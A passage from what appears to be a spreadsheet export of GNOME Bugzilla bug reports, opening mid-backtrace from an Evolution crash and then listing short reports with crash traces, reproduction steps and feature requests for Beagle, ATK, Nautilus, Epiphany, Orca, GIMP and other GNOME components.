    invocation_hint=0x0) at gclosure.c:490
#22 0x061a8df4 in bonobo_closure_invoke_va_list ()
   from /usr/lib/libbonobo-2.so.0
#23 0x061a900e in bonobo_closure_invoke () from
/usr/lib/libbonobo-2.so.0
#24 0x0639ae2a in bonobo_ui_component_add_verb_list ()
   from /usr/lib/libbonoboui-2.so.0
#25 0x061ab1e1 in _ORBIT_skel_small_Bonobo_UIComponent_execVerb ()
   from /usr/lib/libbonobo-2.so.0
#26 0x060740c0 in ORBit_c_stub_invoke () from /usr/lib/libORBit-2.so.0
#27 0x061b2ac4 in Bonobo_UIComponent_execVerb ()
   from /usr/lib/libbonobo-2.so.0
#28 0x063a185b in bonobo_ui_engine_add_sync ()
   from /usr/lib/libbonoboui-2.so.0
#29 0x00c60873 in IA__g_cclosure_marshal_VOID__POINTER
(closure=0x8a4fd18 
    return_value=0x0 n_param_values=2 param_values=0xbf87efac 
    invocation_hint=0xbf87ee8c marshal_data=0x63a16a0) at
gmarshal.c:601
#30 0x00c517d9 in g_type_class_meta_marshal (closure=0x8a4fd18 
    return_value=0x0 n_param_values=2 param_values=0xbf87efac 
    invocation_hint=0xbf87ee8c marshal_data=0x4c) at gclosure.c:567
#31 0x00c52f9d in IA__g_closure_invoke (closure=0x8a4fd18
return_value=0x0 
    n_param_values=2 param_values=0xbf87efac
invocation_hint=0xbf87ee8c)
    at gclosure.c:490
#32 0x00c65803 in signal_emit_unlocked_R (node=0x8a4fd68 detail=0 
    instance=0x8a8cc70 emission_return=0x0
instance_and_params=0xbf87efac)
    at gsignal.c:2476
#33 0x00c66623 in IA__g_signal_emit_valist (instance=0x8a8cc70 
    signal_id=141 detail=0 var_args=0xbf87f1f0 \234Ã´\207Â¿p\aÃ†)
    at gsignal.c:2197
#34 0x00c668c9 in IA__g_signal_emit (instance=0x8a8cc70 signal_id=141
    detail=0) at gsignal.c:2241
#35 0x0639d388 in bonobo_ui_engine_emit_verb_on_w ()
   from /usr/lib/libbonoboui-2.so.0
#36 0x063a69f5 in bonobo_ui_sync_menu_new () from
/usr/lib/libbonoboui-2.so.0
#37 0x00c607b9 in IA__g_cclosure_marshal_VOID__VOID (closure=0xab44278
    return_value=0x0 n_param_values=1 param_values=0xbf87f49c 
    invocation_hint=0xbf87f37c marshal_data=0x63a69c0) at
gmarshal.c:77
#38 0x00c52f9d in IA__g_closure_invoke (closure=0xab44278
return_value=0x0 
    n_param_values=1 param_values=0xbf87f49c
invocation_hint=0xbf87f37c)
    at gclosure.c:490
#39 0x00c651c5 in signal_emit_unlocked_R (node=0x8a64470 detail=0 
    instance=0xb49f880 emission_return=0x0
instance_and_params=0xbf87f49c)
    at gsignal.c:2438
#40 0x00c66623 in IA__g_signal_emit_valist (instance=0xb49f880 
    signal_id=169 detail=0 var_args=0xbf87f6dc Â¨Â¦Ãˆ) at
gsignal.c:2197
#41 0x00c668c9 in IA__g_signal_emit (instance=0xb49f880 signal_id=169
    detail=0) at gsignal.c:2241
#42 0x00313cdf in closure_accel_activate (closure=0xb545cd0 
    return_value=0xbf87f830 n_param_values=4 param_values=0xbf87f93c
    invocation_hint=0xbf87f81c marshal_data=0x0) at gtkwidget.c:3151
#43 0x00c52f9d in IA__g_closure_invoke (closure=0xb545cd0 
    return_value=0xbf87f830 n_param_values=4 param_values=0xbf87f93c
    invocation_hint=0xbf87f81c) at gclosure.c:490
#44 0x00c651c5 in signal_emit_unlocked_R (node=0x8a67d70 detail=1747 
    instance=0x8a84f20 emission_return=0xbf87fafc 
    instance_and_params=0xbf87f93c) at gsignal.c:2438
#45 0x00c664d6 in IA__g_signal_emit_valist (instance=0x8a84f20 
    signal_id=162 detail=1747 var_args=0xbf87fb88
\230Ã»\207Â¿Ã»b\024)
    at gsignal.c:2207
#46 0x00c668c9 in IA__g_signal_emit (instance=0x8a84f20 signal_id=162
    detail=1747) at gsignal.c:2241
#47 0x001464e9 in IA__gtk_accel_group_activate (accel_group=0x8a84f20 
    accel_quark=1747 acceleratable=0x8a8d800 accel_key=112 
    accel_mods=GDK_CONTROL_MASK) at gtkaccelgroup.c:766
#48 0x001465ea in IA__gtk_accel_groups_activate (object=0x8a8d800 
    accel_key=112 accel_mods=GDK_CONTROL_MASK) at gtkaccelgroup.c:804
#49 0x0032134a in IA__gtk_window_activate_key (window=0x8a8d800 
    event=0xc166110) at gtkwindow.c:7506
#50 0x003213bc in gtk_window_key_press_event (widget=0x8a8d800 
    event=0xc166110) at gtkwindow.c:4543
#51 0x063b6904 in bonobo_window_remove_popup ()
   from /usr/lib/libbonoboui-2.so.0
#52 0x0022463e in _gtk_marshal_BOOLEAN__BOXED (closure=0x8866548 
    return_value=0xbf87fde0 n_param_values=2 param_values=0xbf87feec
    invocation_hint=0xbf87fdcc marshal_data=0x63b68c0) at
gtkmarshalers.c:83
#53 0x00c517d9 in g_type_class_meta_marshal (closure=0x8866548 
    return_value=0xbf87fde0 n_param_values=2 param_values=0xbf87feec
    invocation_hint=0xbf87fdcc marshal_data=0xcc) at gclosure.c:567
#54 0x00c52f9d in IA__g_closure_invoke (closure=0x8866548 
    return_value=0xbf87fde0 n_param_values=2 param_values=0xbf87feec
    invocation_hint=0xbf87fdcc) at gclosure.c:490
#55 0x00c65803 in signal_emit_unlocked_R (node=0x88667c8 detail=0 
    instance=0x8a8d800 emission_return=0xbf8800ac 
    instance_and_params=0xbf87feec) at gsignal.c:2476
#56 0x00c664d6 in IA__g_signal_emit_valist (instance=0x8a8d800
signal_id=65 
    detail=0 var_args=0xbf880130 H\001\210Â¿\020a\026\f) at
gsignal.c:2207
#57 0x00c668c9 in IA__g_signal_emit (instance=0x8a8d800 signal_id=65 
    detail=0) at gsignal.c:2241
#58 0x0030f208 in gtk_widget_event_internal (widget=0x8a8d800 
    event=0xc166110) at gtkwidget.c:3735
#59 0x0021e08a in IA__gtk_propagate_event (widget=0x8a8d800
event=0xc166110)
    at gtkmain.c:2149
#60 0x0021f2a7 in IA__gtk_main_do_event (event=0xc166110) at
gtkmain.c:1412
#61 0x004938aa in gdk_event_dispatch (source=0x880ba90 callback=0 
    user_data=0x0) at gdkevents-x11.c:2291
#62 0x00bdb11d in IA__g_main_context_dispatch (context=0x880bad8)
    at gmain.c:1916
#63 0x00bde3af in g_main_context_iterate (context=0x880bad8 block=1 
    dispatch=1 self=0x87f0a40) at gmain.c:2547
#64 0x00bde759 in IA__g_main_loop_run (loop=0x88b8d68) at gmain.c:2751
#65 0x06196bd3 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#66 0x0805e12a in main (argc=1 argv=0xbf880664) at main.c:603
#67 0x007d9784 in __libc_start_main () from /lib/libc.so.6
#68 0x0804fe71 in _start ()
Thread 11 (Thread -1226355808 (LWP 1938)):
#0  0x004ef402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x00a58106 in pthread_cond_wait@@GLIBC_2.3.2 () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x06641e89 in e_msgport_wait (mp=0x88cd468) at e-msgport.c:660
No locals.
#3  0x06641fa9 in thread_dispatch (din=0x88cd408) at e-msgport.c:1022
	e = 
Thread 10 (Thread -1236845664 (LWP 1939)):
#0  0x004ef402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x00a58106 in pthread_cond_wait@@GLIBC_2.3.2 () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x06641e89 in e_msgport_wait (mp=0x88cd468) at e-msgport.c:660
No locals.
#3  0x06641fa9 in thread_dispatch (din=0x88cd408) at e-msgport.c:1022
	e = 
Thread 9 (Thread -1247335520 (LWP 1942)):
#0  0x004ef402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x0088280c in poll () from /lib/libc.so.6
No symbol table info available.
#2  0x00bde3e3 in g_main_context_iterate (context=0x8ac9a00 block=1 
    dispatch=1 self=0x8ac4a60) at gmain.c:2849
	got_ownership = 
Thread 8 (Thread -1257825376 (LWP 1943)):
#0  0x004ef402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x00a58106 in pthread_cond_wait@@GLIBC_2.3.2 () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x06641e89 in e_msgport_wait (mp=0x8ad1880) at e-msgport.c:660
No locals.
#3  0x06641fa9 in thread_dispatch (din=0x8ad19d0) at e-msgport.c:1022
	e = 
Thread 7 (Thread -1268708448 (LWP 1968)):
#0  0x004ef402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x00a58106 in pthread_cond_wait@@GLIBC_2.3.2 () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x06641e89 in e_msgport_wait (mp=0x88cd468) at e-msgport.c:660
No locals.
#3  0x06641fa9 in thread_dispatch (din=0x88cd408) at e-msgport.c:1022
	e = 
Thread 6 (Thread -1295324256 (LWP 1969)):
#0  0x004ef402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x00a58106 in pthread_cond_wait@@GLIBC_2.3.2 () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x06641e89 in e_msgport_wait (mp=0x88cd468) at e-msgport.c:660
No locals.
#3  0x06641fa9 in thread_dispatch (din=0x88cd408) at e-msgport.c:1022
	e = 
Thread 5 (Thread -1306207328 (LWP 1972)):
#0  0x004ef402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x00a58106 in pthread_cond_wait@@GLIBC_2.3.2 () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x06641e89 in e_msgport_wait (mp=0x8834c48) at e-msgport.c:660
No locals.
#3  0x06641fa9 in thread_dispatch (din=0x8834be8) at e-msgport.c:1022
	e = 
Thread 4 (Thread -1316697184 (LWP 1973)):
#0  0x004ef402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x00a58106 in pthread_cond_wait@@GLIBC_2.3.2 () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x06641e89 in e_msgport_wait (mp=0x88c70d8) at e-msgport.c:660
No locals.
#3  0x06641fa9 in thread_dispatch (din=0x88c7078) at e-msgport.c:1022
	e = 
Thread 3 (Thread -1327338592 (LWP 1976)):
#0  0x004ef402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x0088280c in poll () from /lib/libc.so.6
No symbol table info available.
#2  0x00bde3e3 in g_main_context_iterate (context=0x8e8c388 block=1 
    dispatch=1 self=0x8e11958) at gmain.c:2849
	got_ownership = 
Thread 2 (Thread -1329595488 (LWP 2534)):
#0  0x004ef402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x0088280c in poll () from /lib/libc.so.6
No symbol table info available.
#2  0x00bde3e3 in g_main_context_iterate (context=0x90736e8 block=1 
    dispatch=1 self=0x9073768) at gmain.c:2849
	got_ownership = 
Thread 1 (Thread -1208665920 (LWP 1936)):
#0  0x004ef402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x00a5b80b in __waitpid_nocancel () from /lib/libpthread.so.0
No symbol table info available.
#2  0x06317086 in gnome_init_with_popt_table ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  IA__g_logv (log_domain=) at gmessages.c:503
	buffer = \000\001 '\0'  
5Ã¶Â·Ã°Ã—\207Â¿Â¨Ã•\001\006Ã˜\017|\000\235\022Ã‹\002(Ãš\207Â¿O\000\001\006\001\000\000\000\2302Ã¶Â·\020Ã˜\207Â¿p5\004\006\034ÃÂ¬\b\002\000\000\000\002\000\000\000\202Ã£\001\006Â§Ã‘Â¬\bp5\004\006\210Ã˜\207Â¿O\000\001\006\001\000\000\000Ã¨j\003\006Ã›a\003\006Ã…\000\000\000\026j\003\006\215\000\000\000Âº\203\003\006O\000\001\006p5\004\006p5\004\006Â¸Ã˜\207Â¿+Âº\001\006\001\000\000\000Â¿s\003\006Ãr\003\006O\000\001\006\203\003\006p5\004\006Ã˜Ã˜\207Â¿O\000\001\006\001\000\000\000Â¿s\003\006Ãr\003\006\025\002\000\000\203\003\006p5\004\006\210Ã™\207Â¿oÂ£Ã¾\005...
	depth = 0
	domain = (GLogDomain *) 0x0
	data = 0x0
	log_func = 0xbe4560 
	domain_fatal_mask = 5
	test_level =
------- Bug created by bug-buddy at 2006-02-15 20:26 -------
</t>
  </si>
  <si>
    <t>luke.hutch</t>
  </si>
  <si>
    <t>BEAGLE-324910</t>
  </si>
  <si>
    <t>Seperate UI-related dependencies from beagled</t>
  </si>
  <si>
    <t>As discussed with Joe it will be helpful if dependecies of core beagled could be reduced. That way users could install only the daemon and use pybeagle/libbeagle client to access it.
IMO the following areas should be changed:
(1) provide --disable-gui option to configure it will build only beagled filters and other necessary components.
(2) separate Util/ into Util.dll and UiUtil.dll and build the latter based on the configure time switch.
(3) Similar to e-d-s users might e.g. want to use beagle only for files (i.e. no emails). configure should detect if gmime# is present and build evo and kmail backend only if gmime# is present. That way gmime# becomes a recommended dependency and not absolutely required dependency.</t>
  </si>
  <si>
    <t>FILEMANAGER-ACTIONS-338773</t>
  </si>
  <si>
    <t>FILEMANAGER-ACTIONS</t>
  </si>
  <si>
    <t>Typos in the PO file</t>
  </si>
  <si>
    <t>1.
po:146
reference:	â‘¤	../libnautilus-actions/nautilus-actions-config-gconf-private.h:83
Original:	âŒ˜0	If you need to mach a filename in a case sensitive manner set this key to 
'true'. If you want that for example '*.jpg' match also 'photo.JPG' set 
'false'
- mach
+ match
- case sensitive
+ case-sensitive
-  If you want that for example '*.jpg' match also 'photo.JPG' set 
'false'
+ If you also want for example '*.jpg' to match 'photo.JPG' set 
'false'
2.
po:147
reference:	â‘¤	../libnautilus-actions/nautilus-actions-config-gconf-private.h:84
Original:	âŒ˜0	The list of pattern to match the mimetypes of the selected file(s)
- pattern
+ patterns
from Clytie Vietnamese translator</t>
  </si>
  <si>
    <t>nautilus-actions-maint</t>
  </si>
  <si>
    <t>clytie</t>
  </si>
  <si>
    <t>ATK-477705</t>
  </si>
  <si>
    <t>atk_object_connect_property_change_handler: guint instead of gulong</t>
  </si>
  <si>
    <t>atk_object_connect_property_change_handler returns an ID as guint. The implementation of this function uses g_signal_connect_closure_by_id which returns the ID as gulong though.
So if the latter ID is greater than the maximum guint value(e.g. on architectures x86_64 ia64 ppc64 s390X where sizeof(long) = 8 sizeof(int) = 4) the ID returned by atk_object_connect_property_change_handler cannot be processed properly by atk_object_remove_property_change_handler.
(atk_object_remove_property_change_handler calls g_signal_closure_disconnect to remove a handler with a given gulong ID).
The detailed bug description can be found at: 
http://linuxtesting.org/results/report?num=S0567</t>
  </si>
  <si>
    <t>atk-maint</t>
  </si>
  <si>
    <t>GOK-133296</t>
  </si>
  <si>
    <t>GOK not listing items on Desktop with UI Grab</t>
  </si>
  <si>
    <t>Using GOK from CVS HEAD 3rd Jan 2004
-Launch GOK 
 'access method' is set to 'dwell' and dwell's 'action' is set 
 to 'core pointer'
-Activate 'desktop'
-Click on 'UI Grab'
-Click on 'Icon View'
Nothing Happens. Normally the user is given a list of the icons currently
on the desktop. Only alternative is to access these with the composer keyboard.</t>
  </si>
  <si>
    <t>EVOLUTION-204101</t>
  </si>
  <si>
    <t>New Appointment Send as iCal crashes evolution-calendar</t>
  </si>
  <si>
    <t>Program received signal SIGSEGV Segmentation fault.
0x80639a8 in GNOME_Evolution_Composer_setHeaders (_obj=0x81cd970 
    to=0x820865c cc=0x81fd87c bcc=0x81fd8ec subject=0x0 ev=0xbfffeea4)
    at Evolution-Composer-stubs.c:301
#0  0x80639a8 in GNOME_Evolution_Composer_setHeaders (_obj=0x81cd970 
    to=0x820865c cc=0x81fd87c bcc=0x81fd8ec subject=0x0 ev=0xbfffeea4)
    at Evolution-Composer-stubs.c:301
#1  0x808de0f in itip_send_comp (method=CAL_COMPONENT_METHOD_PUBLISH 
    comp=0x81e41f0) at itip-utils.c:193
#2  0x809b83b in comp_editor_send_comp (editor=0x81d31f0 
    method=CAL_COMPONENT_METHOD_PUBLISH) at comp-editor.c:604
#3  0x809e504 in forward_cmd (widget=0x81cd720 data=0x81d31f0)
    at event-editor.c:262
#4  0x407db5b4 in impl_Bonobo_UIComponent_execVerb (servant=0x81cd77c 
    cname=0x8246978 ActionForward ev=0xbfffef64)
    at bonobo-ui-component.c:123
#5  0x406ee4bc in Bonobo_UIComponent_execVerb (_obj=0x81cd73c 
    cname=0x8246978 ActionForward ev=0xbfffef64) at Bonobo-stubs.c:7746
#6  0x407e0ac5 in real_exec_verb (engine=0x81d3098 
    component_name=0x81cdea0 comp-editor verb=0x8246978 ActionForward)
    at bonobo-ui-engine.c:1364
#7  0x407e0c6e in impl_emit_verb_on (engine=0x81d3098 node=0x8247548)
    at bonobo-ui-engine.c:1412
#8  0x40453ae9 in gtk_marshal_NONE__POINTER (object=0x81d3098 
    func=0x407e0b44  func_data=0x0 args=0xbffff034)
    at gtkmarshal.c:193
#9  0x4047f9e8 in gtk_signal_real_emit (object=0x81d3098 signal_id=200 
    params=0xbffff034) at gtksignal.c:1492
#10 0x4047dc40 in gtk_signal_emit (object=0x81d3098 signal_id=200)
    at gtksignal.c:552
#11 0x407e294a in bonobo_ui_engine_emit_verb_on_w (engine=0x81d3098 
    widget=0x8220efc) at bonobo-ui-engine.c:2762
#12 0x407e5de3 in exec_verb_cb (item=0x8220efc engine=0x81d3098)
    at bonobo-ui-sync-menu.c:519
#13 0x40453c3f in gtk_marshal_NONE__NONE (object=0x8220efc 
    func=0x407e5db8  func_data=0x81d3098 args=0xbffff3b4)
    at gtkmarshal.c:312
#14 0x404804d7 in gtk_handlers_run (handlers=0x8239e90 signal=0xbffff370 
    object=0x8220efc params=0xbffff3b4 after=0) at gtksignal.c:1917
#15 0x4047f9af in gtk_signal_real_emit (object=0x8220efc signal_id=94 
    params=0xbffff3b4) at gtksignal.c:1477
#16 0x4047dc40 in gtk_signal_emit (object=0x8220efc signal_id=94)
    at gtksignal.c:552
#17 0x404b27db in gtk_widget_activate (widget=0x8220efc) at gtkwidget.c:2890
#18 0x4045b61b in gtk_menu_shell_activate_item (menu_shell=0x81ecef0 
    menu_item=0x8220efc force_deactivate=1) at gtkmenushell.c:859
#19 0x4045a9fb in gtk_menu_shell_button_release (widget=0x81ecef0 
    event=0x81b7388) at gtkmenushell.c:486
#20 0x40453921 in gtk_marshal_BOOL__POINTER (object=0x81ecef0 
    func=0x4045a878  func_data=0x0 
    args=0xbffff724) at gtkmarshal.c:28
#21 0x4047f9e8 in gtk_signal_real_emit (object=0x81ecef0 signal_id=27 
    params=0xbffff724) at gtksignal.c:1492
#22 0x4047dc40 in gtk_signal_emit (object=0x81ecef0 signal_id=27)
    at gtksignal.c:552
#23 0x404b26ab in gtk_widget_event (widget=0x81ecef0 event=0x81b7388)
    at gtkwidget.c:2864
#24 0x40453889 in gtk_propagate_event (widget=0x8220efc event=0x81b7388)
    at gtkmain.c:1378
#25 0x40452b1a in gtk_main_do_event (event=0x81b7388) at gtkmain.c:818
#26 0x40506392 in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffffaa8 user_data=0x0) at gdkevents.c:2139
#27 0x405369f6 in g_main_dispatch (dispatch_time=0xbffffaa8) at gmain.c:656
#28 0x40536fb1 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#29 0x40537129 in g_main_run (loop=0x811f3c8) at gmain.c:935
#30 0x4045248a in gtk_main () at gtkmain.c:524
#31 0x4070d082 in bonobo_main () at bonobo-main.c:283
#32 0x808e251 in main (argc=1 argv=0xbffffb54) at main.c:88</t>
  </si>
  <si>
    <t>NAUTILUS-83705</t>
  </si>
  <si>
    <t>Launcher from desktop crashes.</t>
  </si>
  <si>
    <t>Trying on 29th build on Solaris.
Right click on the desktop click on new launcher.
Give name give command say gedit
And it crashes in application gnome-desktop-item-edit.
 --- called from signal handler with signal 11 (SIGSEGV) ---
 fdcb3344 strlen   (0 ffbed488 0 fdd3b791 0 30f1e) + 80
 fdd050ac vsnprintf (ffbed35b 7fffffff 30f18 ffbed488 81010100 0) + 5c
 fddf29e4 g_printf_string_upper_bound (30f18 ffbed488 0 1 81010100
ff00) + 4c
 fde09eb4 g_strdup_vprintf (30f18 ffbed488 ffbed48c 656e7400 0 3a) +
44
 fde09f6c g_strdup_printf (30f18 0 15eb68 0 0 0) + 54
Complete stack is attached.</t>
  </si>
  <si>
    <t>dcamp</t>
  </si>
  <si>
    <t>EVOLUTION-200859</t>
  </si>
  <si>
    <t>addressbook component crashes on reply to a message</t>
  </si>
  <si>
    <t>Sorry about the mis-file I'm moving this over to bugzilla.
New info: I've actually tried other messages and they crash.  As of right now
the addressbook component crashes every time I send mail but the mail still
get's sent.
I've tested this on two messages both mailman subscription requests
and evolution has crashed after each one.  I clicked on reply then
once the message appeared clicked send and it crashed.
Debugging information:
[New Thread 1024 (LWP 16544)]
0x408e1b69 in __wait4 () from /lib/libc.so.6
#0  0x408e1b69 in __wait4 () from /lib/libc.so.6
#1  0x4094a9a0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40683692 in waitpid (pid=16566 stat_loc=0xbfffef80 options=0)
    at wrapsyscall.c:174
#3  0x40554b97 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#4   #0  0x408e1b69 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x4094a9a0 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40683692 in waitpid (pid=16566 stat_loc=0xbfffef80 options=0)
    at wrapsyscall.c:174
stat_loc = (int *) 0xbfffef80
options = 0
result = 0
oldtype = 0
#3  0x40554b97 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#4   No locals.
#0  0x0 in ?? ()
No symbol table info available.
#0  0x0 in ?? ()
No symbol table info available.
#0  0x0 in ?? ()
No symbol table info available.</t>
  </si>
  <si>
    <t>VTE-97230</t>
  </si>
  <si>
    <t>Extending selection is broken</t>
  </si>
  <si>
    <t>While attempting to debug other selection problems I noticed
that vte (and therefore gnome-terminal) supports extending a
selection by shift-left-click.
I attempted to use this feature but noticed that it sometimes
doesn't work as expected.  Instead of extending the selection
it will sometimes throw away the original selection but use the
original endpoint as a new starting point and make the new
shift-click location the new endpoint.  It wouldn't always do this however.</t>
  </si>
  <si>
    <t>EPIPHANY-130206</t>
  </si>
  <si>
    <t>image download instead of form execution</t>
  </si>
  <si>
    <t>If the execute button on a form is an image instead of a button
pressing enter downloads the image rather than executing the form.
Steps to reproduce the problem:
1. Go to http://www.amazon.com
2. In the search box on the left hand side enter the work UNIX in the
text entry
3. Press enter.
4. Image of the Go! button is downloaded rather than the search being
performed.
Actual Results:
Image downloaded.
Expected Results:
the search to be performed.
How often does this happen?
every time the button for the form is an image.</t>
  </si>
  <si>
    <t>parrishmyers</t>
  </si>
  <si>
    <t>EVOLUTION-311555</t>
  </si>
  <si>
    <t>sharing tab missing for user-created folders with names like Mailbox Trash...</t>
  </si>
  <si>
    <t>Version details: 2.3.5
Distribution/Version: SuSE 9.3
1. Create a subfolder with the name Mailbox or Trash or the name of any other
default folder
2. Right-click on the folder and select properties
The sharing tab will be missing.
Expected results:
The sharing tab should be present since it is a user-created folder and not a
default folder.</t>
  </si>
  <si>
    <t>jvivek</t>
  </si>
  <si>
    <t>EVOLUTION-252301</t>
  </si>
  <si>
    <t>Newly created task lists not show in folder tree</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
I do not have an existing task list selected and I right click in a blank
area of the folder tree panel. I select new task list in the pop up menu.
After I enter the name of the new task list and click OK in the Add new
task list dialog the task list is not display in the task folder tree. 
The directory for the new task list is created however it is not displayed
in the task list tree until I restart evolution. Collapsing and expanding
the tree does not help.
If I have an existing task list selected when I create a new task list then
the new task list is displayed in the task list tree.
Additional Information:
Machine Configuration
------------------------------------------------------------------
Red Hat Linux release 9 (Shrike) i386 2.4.20-20.8
evolution1.5-1.5.0.200312161929-0.snap.ximian.6.1
evolution-data-server-0.0.3.0.200312170732-0.snap.ximian.6.1
soup-0.7.10-4
libsoup-1.99.28.0.200310211728-0.snap.ximian.6.1
libsoup2.2-2.1.2.0.200312170732-0.snap.ximian.6.1
libgtkhtml3.1_3-3.1.4.0.200312161929-0.snap.ximian.6.1
libgal21-0.23-1
libgal2.0_3-1.99.8-0.ximian.6.3
libgal2.2_0-2.1.1.0.200312170732-0.snap.ximian.6.1
gtkhtml-1.1.8-5
gtkhtml3.0-3.0.9-0.ximian.6.1
gtkhtml3.1-3.1.4.0.200312161929-0.snap.ximian.6.1
gal-0.23-1
pilot-link-0.11.5-4
gnome-pilot-0.1.71-2
gnome-mime-data-2.2.0-1
gtk+-1.2.10-25
gtk2-2.2.1-4
bonobo-1.0.22-4
libbonoboui-2.4.1-0.ximian.6.1
libbonobo-2.4.2-0.ximian.6.2
libgnomecanvas-2.2.0.2-0.ximian.6.2
ORBit2-2.9.0-0.ximian.6.1</t>
  </si>
  <si>
    <t>GNOPERNICUS-120471</t>
  </si>
  <si>
    <t>no accelarator in magnifier preferences</t>
  </si>
  <si>
    <t>using gnome-2.4 build from 21/08/03.
-launch gnopernicus with magnifier enabled
-go to preferences-&gt;magnifier
.there is no accelarator e.g alt-A or alt-R for accessing the add/modify
or remove buttons for accessing zoomer options.</t>
  </si>
  <si>
    <t>ps</t>
  </si>
  <si>
    <t>GNOME-MAG-341883</t>
  </si>
  <si>
    <t>Wrong behave changin the {xy} alignment</t>
  </si>
  <si>
    <t>When the {xy} alignment property of some zoom region is changed the code that effectively implements this change is wrong. The function called is zoom_region_update_current instead of zoom_region_align that takes in account the align policy and then calls zoom_region_update_current.</t>
  </si>
  <si>
    <t>GLOM-354073</t>
  </si>
  <si>
    <t>Initial layout of Related item is confusing</t>
  </si>
  <si>
    <t>I was fooling around with the Layout editor and added a Related item to my Details layout. All I got was a table of folder icons. I eventually figured out that if I right-clicked on the layout I could choose what fields in the related item were displayed but it would be good to default it to show at least some field. Also it would be good if the Formatting button in the layout editor dialog took you to the Related Records Layout dialog.
While I'm at it it's not clear to me what the Related layout item even does but that's probably just a matter of me not knowing much about Glom and RDBMSs.</t>
  </si>
  <si>
    <t>ORCA-571799</t>
  </si>
  <si>
    <t>braille</t>
  </si>
  <si>
    <t>(ARIA) Need to clean up braille presentation of certain widgets</t>
  </si>
  <si>
    <t>Our braille presentation of certain ARIA widgets needs to be improved. In particular:
1. Correct display of page tabs (i.e. present full line set visible to begin with current tab for the purpose of orientation as well as cursor routing).
2. Only display the slider when a slider is focused.
3. Lose the bogus EOL indicators we see for paragraphs and other non-editable non-focusable text objects.
I'm sure there are others but these are the most significant at the moment.</t>
  </si>
  <si>
    <t>GIMP-137057</t>
  </si>
  <si>
    <t>Closing last window causes the toolbox to jump to another workspace</t>
  </si>
  <si>
    <t>This is a rather minor problem: closing the last image window causes the
toolbox to be remapped.  For some WMs this causes the toolbox to jump to
the current workspace even if it was on another workspace.  This is a nice
feature because then you don't forget to close the GIMP but unfortunately
the other docks are staying on their previous workspace so if you want to
continue working on other images you have to move the toolbox back to where
it was or move the docks to the current workspace.
To reproduce:
- start the GIMP on one workspace
- open or create a new image
- move it to a different workspace (this can be useful if you are working
  with several large images - let's just say that this one is the last one)
- close the image
Result:
- the toolbox jumps to the current workspace but the docks stay on the
  other one</t>
  </si>
  <si>
    <t>raphael</t>
  </si>
  <si>
    <t>GNOME-PANEL-113831</t>
  </si>
  <si>
    <t>Default panel toplevel configuration sometimes only partially created.</t>
  </si>
  <si>
    <t>Under certain (not fully known) circumstances when the panel is creating a
default configuration (for instance when it is run the first time) the
/apps/panel/profiles/default/toplevels/bottom_panel/background 
and 
/apps/panel/profiles/default/toplevels/top_panel/background 
gconf keys (and their subkeys) aren't created.
See Bug 113655.</t>
  </si>
  <si>
    <t>halfline-bugzilla</t>
  </si>
  <si>
    <t>NAUTILUS-139260</t>
  </si>
  <si>
    <t>Eject &amp; Unmount Error Dialog Title Mixup</t>
  </si>
  <si>
    <t>The error dialog title for unmount/eject are interchanged. If Unmount fails
you get a Eject Error dialog and vice versa.</t>
  </si>
  <si>
    <t>NAUTILUS-112292</t>
  </si>
  <si>
    <t>It is impossible to remove user defined emblems</t>
  </si>
  <si>
    <t>Description of Problem:
Once a user defined emblem has been created it is
impossible to remove it without hand hacking in
the ~/.icons directory.
Steps to reproduce the problem:
1. Open the Background and Emblems dialog
2. Create a new emblem
3. Try to remove it.
Actual Results:
It is not possible to remove the emblem.
Expected Results:
It should be possible to remove user defined
emblems. I tried using a context menu (there is
none) and dragging the user defined emblem to the
trash (which provokes 112278 instead).
How often does this happen?
Always (it is a UI bug)
Additional Information:
Redhat 9 (with no particular customization)</t>
  </si>
  <si>
    <t>EVOLUTION-219624</t>
  </si>
  <si>
    <t>deleting messages from outbox</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0.1
Synopsis: deleting messages from outbox
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Hi!
When I delete a message from the outbox it is not deleted when I click
on receive/send messages (it is sent!!!) I have to empty the trash
previous to send the messages!
Unknown reporter: franjavicano@jazzfree.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>franjavicano</t>
  </si>
  <si>
    <t>EMPATHY-474603</t>
  </si>
  <si>
    <t>Chat</t>
  </si>
  <si>
    <t>The user typing icon is shown even in the user paused typing state.</t>
  </si>
  <si>
    <t>Put another icon instead or just display the presence icon.
Other information:</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-324748</t>
  </si>
  <si>
    <t>Need to add GNOME version to enter_bug.cgi</t>
  </si>
  <si>
    <t>It isn't on there.</t>
  </si>
  <si>
    <t>MEMPROF-132904</t>
  </si>
  <si>
    <t>MEMPROF</t>
  </si>
  <si>
    <t>Should use GtkFileChooser instead of GtkFileSel</t>
  </si>
  <si>
    <t>It would be good to minimize instances of the old GtkFileSel for GNOME 2.6
so we don't have multiple widgets for doing the same thing in the interface.</t>
